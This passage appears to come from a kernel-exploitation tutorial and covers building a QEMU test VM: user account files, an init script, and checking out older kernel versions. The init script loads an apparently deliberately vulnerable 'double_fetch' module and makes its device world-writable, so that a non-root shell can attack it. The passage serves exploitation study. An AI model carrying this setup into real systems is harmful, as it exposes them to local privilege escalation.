no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

Once we make this executable and run it, we get loaded into a VM!

User Accounts

Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:

~ # whoami
whoami: unknown uid 0

This is because /etc/passwd and /etc/group don't exist, so we can just create those!

/etc/passwd

root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh

/etc/group

root:x:0:
user:x:1000:

Loading the Kernel Module

The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

#!/bin/sh

insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch

mount -t proc none /proc
mount -t sysfs none /sys

mknod -m 666 /dev/ttyS0 c 4 64

setsid /bin/cttyhack setuidgid 1000 /bin/sh

Here I am assuming that the major number of the double_fetch module is 253.

Why am I doing that?

Compiling a Different Kernel Version

If we want to compile a kernel version that is not the latest, we'll dump all the tags:

$ git fetch --tags

It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

$ git checkout v5.11

We then continue from there.

Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.